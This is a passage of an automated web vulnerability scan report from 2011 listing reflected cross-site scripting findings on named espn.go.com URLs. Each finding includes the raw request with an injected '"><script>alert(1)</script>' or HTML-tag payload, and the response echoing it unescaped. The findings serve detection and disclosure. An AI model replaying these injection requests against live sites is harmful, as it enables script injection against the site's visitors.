if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<iframe SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0d59e1';a8fb555b141%3Bn=203%3Bs=9542%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

1.117. http://espn.go.com/blog/new-york/hockey/category/_/name/new-jersey-devils [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://espn.go.com
Path:   /blog/new-york/hockey/category/_/name/new-jersey-devils

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6803a"><a>7c711d6e0b5 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blog/new-york/hockey/category/_/name/new-jersey-devils6803a"><a>7c711d6e0b5 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:20:38 GMT
Content-Type: text/html;charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:20:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN09
Cache-Expires: Wed, 23 Feb 2011 23:25:38 GMT
InvH: blog-new-yorkhockey
Content-Length: 33353
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Hockey Blog - ESPN
...[SNIP]...
<link rel="canonical" href="http://espn.go.com/blog/new-york/hockey/category/_/name/new-jersey-devils6803a"><a>7c711d6e0b5" />
...[SNIP]...

1.118. http://espn.go.com/blog/new-york/hockey/category/_/name/new-york-islanders [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://espn.go.com
Path:   /blog/new-york/hockey/category/_/name/new-york-islanders

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5588e"><a>6fa37241377 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blog/new-york/hockey/category/_/name/new-york-islanders5588e"><a>6fa37241377 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:20:38 GMT
Content-Type: text/html;charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:20:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN06
Cache-Expires: Wed, 23 Feb 2011 23:25:38 GMT
InvH: blog-new-yorkhockey
Content-Length: 33307
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Hockey Blog - ESPN
...[SNIP]...
<link rel="canonical" href="http://espn.go.com/blog/new-york/hockey/category/_/name/new-york-islanders5588e"><a>6fa37241377" />
...[SNIP]...

1.119. http://espn.go.com/blog/new-york/hockey/category/_/name/new-york-rangers [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://espn.go.com
Path:   /blog/new-york/hockey/category/_/name/new-york-rangers

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c495"><a>c35cbec8142 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blog/new-york/hockey/category/_/name/new-york-rangers2c495"><a>c35cbec8142 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:20:42 GMT
Content-Type: text/html;charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:20:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN32
Cache-Expires: Wed, 23 Feb 2011 23:25:42 GMT
InvH: blog-new-yorkhockey
Content-Length: 35047
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Hockey Blog - ESPN
...[SNIP]...
<link rel="canonical" href="http://espn.go.com/blog/new-york/hockey/category/_/name/new-york-rangers2c495"><a>c35cbec8142" />
...[SNIP]...

1.120. http://espn.go.com/blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11851"><script>alert(1)</script>c254b6c06ee was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks11851"><script>alert(1)</script>c254b6c06ee HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:19:58 GMT
Content-Type: text/html;charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:19:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN17
Cache-Expires: Wed, 23 Feb 2011 23:24:58 GMT
InvH: blog-new-yorkknicks
Content-Length: 69717
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Melo will wear No.
...[SNIP]...
<a href="/blog/new-yorkknicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks11851"><script>alert(1)</script>c254b6c06ee/sort/oldest">
...[SNIP]...

1.121. http://espn.go.com/blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3622"><script>alert(1)</script>a8a4b6f11a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks?f3622"><script>alert(1)</script>a8a4b6f11a1=1 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:18:21 GMT
Content-Type: text/html;charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:18:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN13
Cache-Expires: Wed, 23 Feb 2011 23:23:21 GMT
InvH: blog-new-yorkknicks
Content-Length: 69328
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Melo will wear No.
...[SNIP]...
<a href="/blog/new-yorkknicks/post/_/f3622"><script>alert(1)</script>a8a4b6f11a1=1/id/2851/sort/oldest/melo-will-wear-no-7-for-the-knicks">
...[SNIP]...

1.122. http://espn.go.com/blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-time [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-time

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2eb1"><script>alert(1)</script>b1d8aa4d5e3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-timeb2eb1"><script>alert(1)</script>b1d8aa4d5e3 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:20:50 GMT
Content-Type: text/html;charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:20:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN17
Cache-Expires: Wed, 23 Feb 2011 23:25:50 GMT
InvH: blog-new-yorkjets
Content-Length: 55011
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Rex, Tannenbaum rea
...[SNIP]...
<a href="/blog/new-yorkjets/post/_/rex-tannenbaum-ready-for-prime-timeb2eb1"><script>alert(1)</script>b1d8aa4d5e3/id/4686/sort/oldest">
...[SNIP]...

1.123. http://espn.go.com/blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-time [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-time

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f156"><script>alert(1)</script>4a93f5fb5e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-time?1f156"><script>alert(1)</script>4a93f5fb5e8=1 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:19:58 GMT
Content-Type: text/html;charset=iso-8859-1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Wed, 23 Feb 2011 23:24:58 GMT
InvH: blog-new-yorkjets
Content-Length: 54453
Cache-Control: no-cache
Pragma: no-cache
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Rex, Tannenbaum rea
...[SNIP]...
<a href="/blog/new-yorkjets/post/_/id/4686/1f156"><script>alert(1)</script>4a93f5fb5e8=1/sort/oldest/rex-tannenbaum-ready-for-prime-time">
...[SNIP]...

1.124. http://espn.go.com/espn/rss/newyork/news [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://espn.go.com
Path:   /espn/rss/newyork/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 993b0<a>c8de8f03e79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /espn/rss/newyork/news?993b0<a>c8de8f03e79=1 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=15
Date: Wed, 23 Feb 2011 23:20:52 GMT
Content-Type: text/xml; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:20:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Wed, 23 Feb 2011 23:36:07 GMT
Content-Length: 14917
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet href="http://sports.espn.go.com/rss/friendlyRSSDemo.xsl" type="text/xsl" media="screen"?>
<rss version="2.0"    xmlns:dc="http://purl.org/dc/eleme
...[SNIP]...
<atom:link rel="self" href="http://sports.espn.go.com/espn/rss/newyork/news?993b0<a>c8de8f03e79=1" />
...[SNIP]...

1.125. http://espn.go.com/ncb/conversation [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /ncb/conversation

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f99b1"><script>alert(1)</script>c51c4c595ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ncb/conversation?gameId=310542599&f99b1"><script>alert(1)</script>c51c4c595ec=1 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5
Date: Wed, 23 Feb 2011 23:22:00 GMT
Content-Type: text/html
Last-Modified: Wed, 23 Feb 2011 23:22:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN09
Cache-Expires: Wed, 23 Feb 2011 23:22:05 GMT
Content-Length: 45097
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="?gameId=310542599&amp;f99b1"><script>alert(1)</script>c51c4c595ec=1&amp;sort=oldest">
...[SNIP]...

1.126. http://espn.go.com/new-york/columns/archive [name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /new-york/columns/archive

Issue detail

The value of the name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0db4"><script>alert(1)</script>35d0e784658 was submitted in the name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york/columns/archive?name=ian-o-connorf0db4"><script>alert(1)</script>35d0e784658 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Wed, 23 Feb 2011 23:13:42 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:13:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Wed, 23 Feb 2011 23:14:42 GMT
Content-Length: 21570
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Ian O'Connor Archiv
...[SNIP]...
<a href="http://search.espn.go.com/ian-o-connorf0db4"><script>alert(1)</script>35d0e784658/">
...[SNIP]...

1.127. http://espn.go.com/videohub/mpf/config.prodXml [adminOver parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /videohub/mpf/config.prodXml

Issue detail

